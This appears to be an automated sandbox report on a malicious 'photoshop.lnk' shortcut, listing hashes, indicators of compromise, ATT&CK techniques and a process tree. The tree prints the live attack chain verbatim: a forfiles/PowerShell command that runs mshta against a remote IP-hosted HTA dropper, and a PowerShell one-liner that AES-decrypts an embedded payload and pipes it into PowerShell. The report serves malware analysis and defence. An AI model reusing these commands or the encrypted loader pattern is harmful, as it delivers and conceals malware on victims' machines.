05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28

General

Target

photoshop.lnk
Size

1KB
MD5

53388b72e46cbc4a0110d3b6d0c0f930
SHA1

46881d02e2249c29ff212eb0bf15ce07828ae519
SHA256

05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28
SHA512

00646615c24cf58f28dfbd6a373f981f85738ec35ca91ef4816198fbc80573ce249083c7df60fdd0a63b42fa1e8011901555be8f5b8181490f2d767a085dc885

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://91.92.251.35/Downloads/Ten/photoshop

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2680	mshta.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2808	powershell.exe
2592	powershell.exe
2708	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2808	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2204 wrote to memory of 2640	2204	cmd.exe	29
PID 2204 wrote to memory of 2640	2204	cmd.exe	29
PID 2204 wrote to memory of 2640	2204	cmd.exe	29
PID 2640 wrote to memory of 2808	2640	forfiles.exe	30
PID 2640 wrote to memory of 2808	2640	forfiles.exe	30
PID 2640 wrote to memory of 2808	2640	forfiles.exe	30
PID 2808 wrote to memory of 2680	2808	powershell.exe	31
PID 2808 wrote to memory of 2680	2808	powershell.exe	31
PID 2808 wrote to memory of 2680	2808	powershell.exe	31
PID 2680 wrote to memory of 2592	2680	mshta.exe	32
PID 2680 wrote to memory of 2592	2680	mshta.exe	32
PID 2680 wrote to memory of 2592	2680	mshta.exe	32
PID 2592 wrote to memory of 2708	2592	powershell.exe	34
PID 2592 wrote to memory of 2708	2592	powershell.exe	34
PID 2592 wrote to memory of 2708	2592	powershell.exe	34

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2204
- C:\Windows\System32\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    start mshta http://91.92.251.35/Downloads/Ten/photoshop
    3⤵
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop
      4⤵
      Blocklisted process makes network request
      Modifies Internet Explorer settings
      Suspicious use of WriteProcessMemory
      PID:2680
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -
        5⤵
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2592
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
        6⤵
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c8c5cb2ab84faebc7a291645b4de7902

SHA1
9d8b8dcc1fe8750a9a91046a8c536c9f6c799151

SHA256
4b006d30021c45aceaea203589686ceac66a233bba36fc61872f97d75bd858f2

SHA512
42c978a2ced1bd0bff6b4d2d6d65c75cbe1b8706e7f0e98a50e17613ffeb684000a5a8758317b400a21c787e852ca97598e5aeb908fbd5f2f5dedb7d5d3dcda5

Download Submit
memory/2592-57-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2592-72-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

Filesize
9.6MB

Download
memory/2592-54-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

Filesize
9.6MB

Download
memory/2592-55-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2592-56-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/2592-60-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2592-53-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2592-59-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

Filesize
9.6MB

Download
memory/2592-58-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2708-66-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

Filesize
9.6MB

Download
memory/2708-67-0x0000000002DB0000-0x0000000002E30000-memory.dmp

Filesize
512KB

Download
memory/2708-69-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

Filesize
9.6MB

Download
memory/2708-70-0x0000000002DB4000-0x0000000002DB7000-memory.dmp

Filesize
12KB

Download
memory/2708-68-0x0000000002DBB000-0x0000000002E22000-memory.dmp

Filesize
412KB

Download
memory/2708-71-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

Filesize
9.6MB

Download
memory/2808-43-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

Filesize
9.6MB

Download
memory/2808-44-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

Filesize
9.6MB

Download
memory/2808-45-0x0000000002D6B000-0x0000000002DD2000-memory.dmp

Filesize
412KB

Download
memory/2808-42-0x0000000002D64000-0x0000000002D67000-memory.dmp

Filesize
12KB

Download
memory/2808-40-0x000000001B790000-0x000000001BA72000-memory.dmp

Filesize
2.9MB

Download
memory/2808-41-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing